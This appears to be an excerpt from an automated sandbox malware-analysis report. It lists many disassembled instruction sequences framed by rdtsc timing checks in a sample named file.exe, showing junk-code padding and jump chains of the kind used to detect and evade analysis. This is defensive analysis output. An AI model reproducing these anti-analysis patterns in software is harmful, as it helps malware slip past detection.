                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5090019 second address: 509001D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 509001D second address: 509003A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7981407BF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 509003A second address: 5090044 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 6ED2A292h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5090044 second address: 5090052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b mov di, cx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5090052 second address: 50900CC instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7980D061BEh 0x00000008 adc si, 4AA8h 0x0000000d jmp 00007F7980D061BBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007F7980D061C8h 0x0000001b sbb ah, 00000008h 0x0000001e jmp 00007F7980D061BBh 0x00000023 popfd 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 pushad 0x00000027 pushad 0x00000028 mov edi, ecx 0x0000002a call 00007F7980D061BEh 0x0000002f pop ecx 0x00000030 popad 0x00000031 mov esi, edi 0x00000033 popad 0x00000034 mov ebp, esp 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F7980D061BFh 0x0000003f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50900CC second address: 50900D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50900D2 second address: 50900D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50900D8 second address: 50900DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C086C second address: 50C087E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7980D061BEh 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C087E second address: 50C08C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7981407BEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F7981407BEBh 0x00000015 xor cx, EF5Eh 0x0000001a jmp 00007F7981407BF9h 0x0000001f popfd 0x00000020 push esi 0x00000021 pop ebx 0x00000022 popad 0x00000023 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C08C1 second address: 50C0921 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, 74h 0x00000005 pushfd 0x00000006 jmp 00007F7980D061C4h 0x0000000b adc cx, 2A88h 0x00000010 jmp 00007F7980D061BBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b jmp 00007F7980D061C6h 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F7980D061C7h 0x00000028 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060181 second address: 5060191 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7981407BECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060191 second address: 50601BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F7980D061C8h 0x0000000f push dword ptr [ebp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50601BC second address: 50601C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50601C0 second address: 50601DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7980D061C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50601DD second address: 506020A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7981407BF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d mov al, 16h 0x0000000f push eax 0x00000010 push edx 0x00000011 call 00007F7981407BEFh 0x00000016 pop ecx 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5080C55 second address: 5080C5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5080C5B second address: 5080C85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7981407BF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7981407BEDh 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5080C85 second address: 5080C8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5080C8B second address: 5080CE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7981407BEAh 0x00000009 jmp 00007F7981407BF5h 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 xchg eax, ebp 0x00000013 pushad 0x00000014 jmp 00007F7981407BF8h 0x00000019 mov edx, eax 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e jmp 00007F7981407BECh 0x00000023 pop ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushad 0x00000028 popad 0x00000029 movsx edi, cx 0x0000002c popad 0x0000002d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5080805 second address: 5080809 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5080809 second address: 508080F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 508080F second address: 508082C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edi 0x00000005 mov ax, 628Fh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7980D061BCh 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 508082C second address: 5080830 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5080830 second address: 5080836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5080836 second address: 508084F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7981407BEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 508084F second address: 5080853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5080853 second address: 5080857 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5080857 second address: 508085D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 508085D second address: 5080884 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 8098h 0x00000007 mov dx, 0E44h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7981407BF6h 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5080884 second address: 50808EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7980D061BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F7980D061BBh 0x00000014 sub cx, 8EBEh 0x00000019 jmp 00007F7980D061C9h 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F7980D061C0h 0x00000025 jmp 00007F7980D061C5h 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50808EB second address: 5080907 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7981407BF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov esi, edi 0x0000000f popad 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5080713 second address: 5080793 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F7980D061C0h 0x00000008 pop esi 0x00000009 jmp 00007F7980D061BBh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 jmp 00007F7980D061BFh 0x00000018 mov ebx, ecx 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c jmp 00007F7980D061C2h 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 push ebx 0x00000027 pop ecx 0x00000028 pushfd 0x00000029 jmp 00007F7980D061C9h 0x0000002e adc ah, FFFFFFF6h 0x00000031 jmp 00007F7980D061C1h 0x00000036 popfd 0x00000037 popad 0x00000038 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5080793 second address: 5080799 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5080799 second address: 50807B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7980D061C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50807B9 second address: 50807BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50807BD second address: 50807C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50807C3 second address: 50807C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5090393 second address: 50903B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov ebp, esp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F7980D061C6h 0x00000010 mov bx, cx 0x00000013 popad 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0758 second address: 50C0795 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7981407BF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F7981407BEEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7981407BEEh 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A02E7 second address: 50A02ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A02ED second address: 50A030F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7981407BF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A030F second address: 50A0313 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0313 second address: 50A0319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0319 second address: 50A0331 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7980D061BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov cx, 5D8Fh 0x00000012 popad 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0331 second address: 50A0358 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 push edx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp+08h] 0x0000000e pushad 0x0000000f mov si, bx 0x00000012 jmp 00007F7981407BEBh 0x00000017 popad 0x00000018 and dword ptr [eax], 00000000h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov esi, ebx 0x00000020 popad 0x00000021 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0358 second address: 50A0391 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7980D061C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax+04h], 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7980D061C7h 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0391 second address: 50A0397 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0397 second address: 50A039B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50805CF second address: 50805D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50805D3 second address: 50805D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50805D9 second address: 5080698 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7981407BF2h 0x00000009 or cx, 99C8h 0x0000000e jmp 00007F7981407BEBh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F7981407BF8h 0x0000001a jmp 00007F7981407BF5h 0x0000001f popfd 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 push eax 0x00000024 pushad 0x00000025 call 00007F7981407BF7h 0x0000002a mov dx, ax 0x0000002d pop esi 0x0000002e mov eax, edi 0x00000030 popad 0x00000031 xchg eax, ebp 0x00000032 pushad 0x00000033 mov edi, 77CCB7D0h 0x00000038 mov eax, ebx 0x0000003a popad 0x0000003b mov ebp, esp 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 pushfd 0x00000041 jmp 00007F7981407BF7h 0x00000046 sbb si, 982Eh 0x0000004b jmp 00007F7981407BF9h 0x00000050 popfd 0x00000051 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5090F0D second address: 5090F13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5090F13 second address: 5090F17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5090F17 second address: 5090F4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F7980D061C8h 0x00000012 or ah, FFFFFF98h 0x00000015 jmp 00007F7980D061BBh 0x0000001a popfd 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5090F4D second address: 5090F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A015B second address: 50A0161 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0161 second address: 50A0165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0165 second address: 50A0169 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0169 second address: 50A018D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7981407BF9h 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0059 second address: 50C005F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C005F second address: 50C006E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7981407BEBh 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C006E second address: 50C009C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7980D061C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7980D061BCh 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C009C second address: 50C00A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C00A2 second address: 50C00A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C00A6 second address: 50C0106 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 jmp 00007F7981407BF9h 0x0000000e mov eax, dword ptr [76FB65FCh] 0x00000013 pushad 0x00000014 mov edi, eax 0x00000016 mov ah, 9Dh 0x00000018 popad 0x00000019 test eax, eax 0x0000001b jmp 00007F7981407BEBh 0x00000020 je 00007F79F327B46Ch 0x00000026 jmp 00007F7981407BF6h 0x0000002b mov ecx, eax 0x0000002d pushad 0x0000002e movzx ecx, dx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0106 second address: 50C010A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C010A second address: 50C0145 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7981407BEFh 0x00000008 or al, FFFFFF9Eh 0x0000000b jmp 00007F7981407BF9h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 xor eax, dword ptr [ebp+08h] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0145 second address: 50C0149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0149 second address: 50C014D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C014D second address: 50C0153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0153 second address: 50C01B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 call 00007F7981407BEDh 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e and ecx, 1Fh 0x00000011 jmp 00007F7981407BF7h 0x00000016 ror eax, cl 0x00000018 jmp 00007F7981407BF6h 0x0000001d leave 0x0000001e pushad 0x0000001f mov si, 50EDh 0x00000023 mov edi, ecx 0x00000025 popad 0x00000026 retn 0004h 0x00000029 nop 0x0000002a mov esi, eax 0x0000002c lea eax, dword ptr [ebp-08h] 0x0000002f xor esi, dword ptr [00B12014h] 0x00000035 push eax 0x00000036 push eax 0x00000037 push eax 0x00000038 lea eax, dword ptr [ebp-10h] 0x0000003b push eax 0x0000003c call 00007F79859F7DBDh 0x00000041 push FFFFFFFEh 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F7981407BEBh 0x0000004a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C01B6 second address: 50C01BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C01BB second address: 50C01F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F7981407BF5h 0x0000000a and si, 2FA6h 0x0000000f jmp 00007F7981407BF1h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov ax, bx 0x0000001f push ebx 0x00000020 pop eax 0x00000021 popad 0x00000022 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C01F9 second address: 50C01FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C01FF second address: 50C021E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a push eax 0x0000000b call 00007F79859F7E17h 0x00000010 mov edi, edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F7981407BF0h 0x0000001b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C021E second address: 50C0224 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0224 second address: 50C027D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7981407BEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F7981407BEEh 0x00000011 and ax, E208h 0x00000016 jmp 00007F7981407BEBh 0x0000001b popfd 0x0000001c mov bl, al 0x0000001e popad 0x0000001f push eax 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 pushfd 0x00000024 jmp 00007F7981407BEEh 0x00000029 xor ch, 00000068h 0x0000002c jmp 00007F7981407BEBh 0x00000031 popfd 0x00000032 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C027D second address: 50C02C2 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7980D061C8h 0x00000008 sbb esi, 4C79D6C8h 0x0000000e jmp 00007F7980D061BBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 movzx ecx, di 0x00000019 popad 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F7980D061BDh 0x00000024 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C02C2 second address: 50C02C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C02C8 second address: 50C02E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7980D061BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7980D061BAh 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C02E8 second address: 50C02EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
